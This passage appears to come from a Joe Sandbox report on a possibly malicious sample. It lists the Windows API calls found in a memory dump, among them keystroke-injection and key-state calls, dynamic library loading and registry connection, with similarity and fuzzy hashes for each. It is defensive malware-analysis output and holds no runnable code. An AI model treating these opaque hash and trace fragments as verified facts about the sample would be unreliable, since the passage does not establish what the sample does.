                            • GetKeyboardState.USER32(?), ref: 0044C570
                            • SetKeyboardState.USER32(00000080), ref: 0044C594
                            • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                            • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                            • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                            • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessagePost$KeyboardState$InputSend
                            • String ID:
                            • API String ID: 2221674350-0
                            • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                            • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                            • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                            • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcscpy$_wcscat
                            • String ID:
                            • API String ID: 2037614760-0
                            • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                            • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                            • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                            • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                            APIs
                            • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                            • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                            • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                            • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                            • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                            • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$Copy$AllocClearErrorLastString
                            • String ID:
                            • API String ID: 960795272-0
                            • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                            • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                            • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                            • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                            APIs
                            • BeginPaint.USER32(00000000,?), ref: 00447BDF
                            • GetWindowRect.USER32(?,?), ref: 00447C5D
                            • ScreenToClient.USER32(?,?), ref: 00447C7B
                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                            • EndPaint.USER32(?,?), ref: 00447D13
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                            • String ID:
                            • API String ID: 4189319755-0
                            • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                            • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                            • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                            • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                            APIs
                            • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                            • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                            • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                            • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                            • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow$InvalidateRect
                            • String ID:
                            • API String ID: 1976402638-0
                            • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                            • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                            • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                            • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                            APIs
                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$Copy$ClearErrorLast
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 2487901850-572801152
                            • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                            • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                            • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                            • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                            APIs
                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Enable$Show$MessageSend
                            • String ID:
                            • API String ID: 1871949834-0
                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                            APIs
                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                            • SendMessageW.USER32 ref: 00471AE3
                            • DestroyIcon.USER32(?), ref: 00471AF4
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                            • String ID:
                            • API String ID: 3611059338-0
                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: DestroyWindow$DeleteObject$IconMove
                            • String ID:
                            • API String ID: 1640429340-0
                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • _wcslen.LIBCMT ref: 004438CD
                            • _wcslen.LIBCMT ref: 004438E6
                            • _wcstok.LIBCMT ref: 004438F8
                            • _wcslen.LIBCMT ref: 0044390C
                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                            • _wcstok.LIBCMT ref: 00443931
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                            • String ID:
                            • API String ID: 3632110297-0
                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$DeleteMenuObject$IconWindow
                            • String ID:
                            • API String ID: 752480666-0
                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                            • String ID:
                            • API String ID: 3275902921-0
                            APIs
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                            • String ID:
                            • API String ID: 3275902921-0
                            APIs
                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            APIs
                            • SendMessageW.USER32 ref: 004555C7
                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Similarity
                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                            • String ID:
                            • API String ID: 3691411573-0
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                            • LineTo.GDI32(?,?,?), ref: 004472AC
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                            • LineTo.GDI32(?,?,?), ref: 004472C6
                            • EndPath.GDI32(?), ref: 004472D6
                            • StrokePath.GDI32(?), ref: 004472E4
                            Similarity
                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                            • String ID:
                            • API String ID: 372113273-0
                            APIs
                            • GetDC.USER32(00000000), ref: 0044CC6D
                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                            Similarity
                            • API ID: CapsDevice$Release
                            • String ID:
                            • API String ID: 1035833867-0
                            APIs
                            • __getptd.LIBCMT ref: 0041708E
                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                            • __amsg_exit.LIBCMT ref: 004170AE
                            • __lock.LIBCMT ref: 004170BE
                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                            • _free.LIBCMT ref: 004170EE
                            • InterlockedIncrement.KERNEL32(02E12D00), ref: 00417106
                            Similarity
                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                            • String ID:
                            • API String ID: 3470314060-0
                            APIs
                            • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                            • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                            • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                            • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                              • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                            • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                            Similarity
                            • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                            • String ID:
                            • API String ID: 3495660284-0
                            APIs
                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                            Similarity
                            • API ID: Virtual
                            • String ID:
                            • API String ID: 4278518827-0
                            APIs
                            • ___set_flsgetvalue.LIBCMT ref: 004151C0
                              • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                              • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                            • ___fls_getvalue@4.LIBCMT ref: 004151CB
                              • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                            • ___fls_setvalue@8.LIBCMT ref: 004151DD
                            • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                            • ExitThread.KERNEL32 ref: 004151ED
                            • __freefls@4.LIBCMT ref: 00415209
                            Similarity
                            • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                            • String ID:
                            • API String ID: 442100245-0
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                            • _wcslen.LIBCMT ref: 0045F94A
                            • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                            Strings
                            Similarity
                            • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                            • String ID: 0
                            • API String ID: 621800784-4108050209
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SetErrorMode.KERNEL32 ref: 004781CE
                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                            • SetErrorMode.KERNEL32(?), ref: 00478270
                            • SetErrorMode.KERNEL32(?), ref: 00478340
                            Strings
                            Similarity
                            • API ID: ErrorMode$AttributesFile_memmove_wcslen
                            • String ID: \VH
                            • API String ID: 3884216118-234962358
                            APIs
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                            • IsMenu.USER32(?), ref: 0044854D
                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                            • DrawMenuBar.USER32 ref: 004485AF
                            Strings
                            Similarity
                            • API ID: Menu$Item$DrawInfoInsert
                            • String ID: 0
                            • API String ID: 3076010158-4108050209
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                            • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                            • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                            Strings
                            Similarity
                            • API ID: MessageSend$_memmove_wcslen
                            • String ID: ComboBox$ListBox
                            • API String ID: 1589278365-1403004172
                            • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                            • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                            • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                            • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                            APIs
                            Strings
                            Similarity
                            • API ID: Handle
                            • String ID: nul
                            • API String ID: 2519475695-2873401336
                            • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                            • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                            • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                            • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                            APIs
                            • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                            Strings
                            Similarity
                            • API ID: Handle
                            • String ID: nul
                            • API String ID: 2519475695-2873401336
                            • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                            • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                            • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                            • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                            Strings
                            Similarity
                            • API ID:
                            • String ID: SysAnimate32
                            • API String ID: 0-1011021900
                            • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                            • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                            • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                            • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                            APIs
                              • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                              • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                              • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                              • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                              • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                            • GetFocus.USER32 ref: 0046157B
                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                              • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                            • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                            • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                            • __swprintf.LIBCMT ref: 00461608
                            Strings
                            Similarity
                            • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                            • String ID: %s%d
                            • API String ID: 2645982514-1110647743
                            • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                            • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                            • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                            • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                            • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                            • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                            • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                            APIs
                            • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                            • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                            Similarity
                            • API ID: Process$CloseCountersCurrentHandleOpen
                            • String ID:
                            • API String ID: 3488606520-0
                            • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                            • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                            • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                            • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                            APIs
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                            Similarity
                            • API ID: ConnectRegistry_memmove_wcslen
                            • String ID:
                            • API String ID: 15295421-0
                            • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                            • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                            • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                            • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                            APIs
                            • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                            • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                            • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                            • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                            Similarity
                            • API ID: AddressProc$Library$FreeLoad
                            • String ID:
                            • API String ID: 2449869053-0
                            • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                            • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                            • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                            • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                            APIs
                            • GetCursorPos.USER32(?), ref: 004563A6
                            • ScreenToClient.USER32(?,?), ref: 004563C3
                            • GetAsyncKeyState.USER32(?), ref: 00456400
                            • GetAsyncKeyState.USER32(?), ref: 00456410
                            • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                            Similarity
                            • API ID: AsyncState$ClientCursorLongScreenWindow
                            • String ID:
